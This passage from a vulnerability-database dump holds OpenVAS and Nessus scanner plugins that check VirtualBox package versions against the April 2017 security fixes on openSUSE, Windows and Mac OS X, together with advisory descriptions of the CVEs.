script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-desktop-icons\", rpm:\"virtualbox-guest-desktop-icons~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-source\", rpm:\"virtualbox-host-source~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-debugsource\", rpm:\"virtualbox-debugsource~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-devel\", rpm:\"virtualbox-devel~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default\", rpm:\"virtualbox-guest-kmp-default~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-kmp-default-debuginfo\", rpm:\"virtualbox-guest-kmp-default-debuginfo~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools\", rpm:\"virtualbox-guest-tools~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-tools-debuginfo\", rpm:\"virtualbox-guest-tools-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11\", rpm:\"virtualbox-guest-x11~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-guest-x11-debuginfo\", rpm:\"virtualbox-guest-x11-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default\", rpm:\"virtualbox-host-kmp-default~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-host-kmp-default-debuginfo\", rpm:\"virtualbox-host-kmp-default-debuginfo~5.0.40_k4.1.39_53~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt\", rpm:\"virtualbox-qt~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-qt-debuginfo\", rpm:\"virtualbox-qt-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv\", rpm:\"virtualbox-websrv~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"virtualbox-websrv-debuginfo\", rpm:\"virtualbox-websrv-debuginfo~5.0.40~40.1\", rls:\"openSUSELeap42.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-07-17T14:21:16", "bulletinFamily": "scanner", "description": "This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-04-25T00:00:00", "id": "OPENVAS:1361412562310811008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811008", "title": "Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811008\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3576\", \"CVE-2017-3558\",\n \"CVE-2017-3587\", \"CVE-2017-3559\", \"CVE-2017-3575\", \"CVE-2017-3513\");\n script_bugtraq_id(97730, 97732, 97759, 97744, 97750, 97739, 97755, 97736);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-25 15:06:13 +0530 (Tue, 25 Apr 2017)\");\n script_name(\"Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n unspecified errors in the 'Core' and 'Shared Folder' sub-component of the\n application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to have an impact on availability, confidentiality and integrity.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.0.38\n and prior to 5.1.20 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.0.38 or 5.1.20 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_win.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!virtualVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(virtualVer =~ \"^(5\\.0)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.0.38\"))\n {\n fix = \"5.0.38\";\n VULN = TRUE;\n }\n}\n\nelse if(virtualVer =~ \"^(5\\.1)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.1.20\"))\n {\n fix = \"5.1.20\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version:virtualVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:19:08", "bulletinFamily": "scanner", "description": "This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-04-25T00:00:00", "id": "OPENVAS:1361412562310811009", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811009", "title": "Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:vm_virtualbox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811009\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3576\", \"CVE-2017-3558\",\n \"CVE-2017-3587\", \"CVE-2017-3559\", \"CVE-2017-3575\", \"CVE-2017-3513\");\n script_bugtraq_id(97730, 97732, 97759, 97744, 97750, 97739, 97755, 97736);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-25 15:12:24 +0530 (Tue, 25 Apr 2017)\");\n script_name(\"Oracle Virtualbox Multiple Unspecified Vulnerabilities - 01 Apr17 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM\n VirtualBox and is prone to multiple unspecified vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to multiple\n unspecified errors in the 'Core' and 'Shared Folder' sub-component of the\n application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to have an impact on availability, confidentiality and integrity.\");\n\n script_tag(name:\"affected\", value:\"VirtualBox versions prior to 5.0.38\n and prior to 5.1.20 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Oracle VirtualBox 5.0.38 or 5.1.20 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_oracle_virtualbox_detect_macosx.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!virtualVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(virtualVer =~ \"^(5\\.0)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.0.38\"))\n {\n fix = \"5.0.38\";\n VULN = TRUE;\n }\n}\n\nelse if(virtualVer =~ \"^(5\\.1)\")\n{\n if(version_is_less(version:virtualVer, test_version:\"5.1.20\"))\n {\n fix = \"5.1.20\";\n VULN = TRUE;\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver( installed_version:virtualVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T03:01:52", "bulletinFamily": "scanner", "description": "This update to virtualbox 5.0.40 fixes the following issues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox. These non-security issues\n were fixed :\n\n - Storage: fixed a potential hang under rare circumstances\n\n - Storage: fixed a potential crash under rare\n circumstances (asynchronous I/O disabled or during\n maintenance file operations like merging snapshots)\n\n - Storage: fixed a potential crash under rare\n circumstances (no asynchronous I/O or during maintenance\n file operations like merging snapshots)\n\n - Linux hosts: make the ALSA backend work again as well as\n Loading the GL libraries on certain hosts\n\n - GUI: don", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-534.NASL", "href": "https://www.tenable.com/plugins/nessus/99957", "published": "2017-05-03T00:00:00", "title": "openSUSE Security Update : virtualbox (openSUSE-2017-534)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-534.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99957);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\", \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\", \"CVE-2017-3587\");\n\n script_name(english:\"openSUSE Security Update : virtualbox (openSUSE-2017-534)\");\n script_summary(english:\"Check for the openSUSE-2017-534 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to virtualbox 5.0.40 fixes the following issues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox. These non-security issues\n were fixed :\n\n - Storage: fixed a potential hang under rare circumstances\n\n - Storage: fixed a potential crash under rare\n circumstances (asynchronous I/O disabled or during\n maintenance file operations like merging snapshots)\n\n - Storage: fixed a potential crash under rare\n circumstances (no asynchronous I/O or during maintenance\n file operations like merging snapshots)\n\n - Linux hosts: make the ALSA backend work again as well as\n Loading the GL libraries on certain hosts\n\n - GUI: don't crash on restoring defaults in the appliance\n import dialog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1034854\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected virtualbox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"python-virtualbox-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"python-virtualbox-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-debugsource-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-devel-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-desktop-icons-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-kmp-default-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-tools-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-tools-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-x11-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-guest-x11-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 